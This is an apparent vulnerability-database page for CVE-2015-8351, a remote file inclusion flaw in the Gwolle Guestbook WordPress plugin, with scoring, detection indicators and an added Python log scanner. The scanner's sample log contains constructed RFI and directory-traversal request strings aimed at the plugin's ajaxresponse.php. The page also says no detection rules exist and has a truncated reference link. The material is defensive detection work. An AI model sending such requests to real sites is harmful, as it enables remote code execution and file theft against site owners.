CVE-2015-8351
Published 2017-09-11
Priority: P1 79 · Severity: critical · CVSS 3.0: 9
CVSS 3.0 vector: AV:N / AC:H / PR:N / UI:N / S:C / C:H / I:H / A:H
Tags: ITW exploit · VulnCheck KEV · Initial access · Exploited in the wild
EPSS: 37.03% (98.3rd percentile)
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gwolle_guestbook_project | gwolle_guestbook | <= 1.5.3 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP GET requests to ajaxresponse.php containing a URL or directory traversal sequence in the 'abspath' parameter, indicating RFI or LFI exploitation attempts.
- Alert on requests to /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php with an external URL value in the abspath parameter (RFI vector).
- LFI exploitation is possible even when allow_url_include is disabled; monitor for directory traversal sequences (e.g., ../) in the abspath parameter regardless of server configuration.
- RFI exploitation requires allow_url_include to be set to 1 in PHP configuration; LFI exploitation is possible regardless of this setting.
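The four detection points above can be turned into a small log check. The following is an added example, not code from the page or from the Gwolle Guestbook project: it parses web-server access-log lines in the common combined format (an assumption; adjust the regex for other formats), selects requests whose path ends in the plugin's ajaxresponse.php, and flags an `abspath` value that carries a URL scheme (RFI) or a `../`-style traversal sequence (LFI). The traversal check is applied regardless of whether `allow_url_include` is on, as the page notes. The log lines, client addresses and abspath values are constructed test data.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not taken from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2017:12:00:01 +0000] "GET /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://198.51.100.10/x HTTP/1.1" 200 512
203.0.113.6 - - [10/Sep/2017:12:00:02 +0000] "GET /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=../../../../example.txt HTTP/1.1" 200 512
203.0.113.7 - - [10/Sep/2017:12:00:03 +0000] "GET /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=%2e%2e%2f%2e%2e%2fexample.txt HTTP/1.1" 200 512
203.0.113.8 - - [10/Sep/2017:12:00:04 +0000] "GET /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/srv/www/ HTTP/1.1" 200 512
203.0.113.9 - - [10/Sep/2017:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

# Request line inside a combined-format log entry: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Path suffix from the page's detection guidance.
TARGET_PATH = "/gwolle-gb/frontend/captcha/ajaxresponse.php"

# A URL scheme at the start of the value (http://, https://, ftp://, ...): RFI vector.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# A directory traversal sequence anywhere in the value: LFI vector.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")


def classify_abspath(value: str) -> Optional[str]:
    """Return 'RFI' for a URL scheme, 'LFI' for a traversal sequence, else None."""
    # parse_qs already decodes once; decoding twice more catches double-encoded
    # sequences such as %252e%252e%252f without affecting plain values.
    decoded = unquote(unquote(value))
    if SCHEME_RE.match(decoded):
        return "RFI"
    if TRAVERSAL_RE.search(decoded):
        return "LFI"
    return None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious abspath value in requests to ajaxresponse.php."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(TARGET_PATH):
            continue
        # keep_blank_values so an empty abspath still shows up as a parameter.
        for value in parse_qs(parts.query, keep_blank_values=True).get("abspath", []):
            kind = classify_abspath(value)
            if kind is not None:
                findings.append(
                    {
                        "line": lineno,
                        "client": line.split()[0],
                        "method": m.group("method"),
                        "kind": kind,
                        "abspath": value,
                    }
                )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} from {f['client']} abspath={f['abspath']!r}")
```

Line 4 of the sample is not flagged: a plain absolute path contains neither a scheme nor a traversal sequence, so by the page's criteria it is not an exploitation indicator. The check only sees what the access log records, i.e. GET query strings; parameters sent in a POST body would need request-body logging or a WAF rule instead.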
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.0 | CRITICAL | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.0 | CRITICAL | — |
GHSA
GHSA-59v2-j7v3-6gmx · ghsa_unreviewed · 2022-05-14 · CVE-2015-8351 [CRITICAL] · CWE-94
Description: same text as the NVD description above.
VulnCheck
vulncheck · 2015 · CVSS 9.0 · CVE-2015-8351 [CRITICAL]
gwolle_guestbook_project gwolle_guestbook: Improper Control of Generation of Code ('Code Injection')
Description: same text as the NVD description above.
Affected: gwolle_guestbook_project gwolle_guestbook
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/th
No detection rules found.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/134599/WordPress-Gwolle-Guestbook-1.5.3-Remote-File-Inclusion.html
- http://www.securityfocus.com/archive/1/537020/100/0/threaded
- https://wordpress.org/plugins/gwolle-gb/changelog/
- https://www.exploit-db.com/exploits/38861/
- https://www.htbridge.com/advisory/HTB23275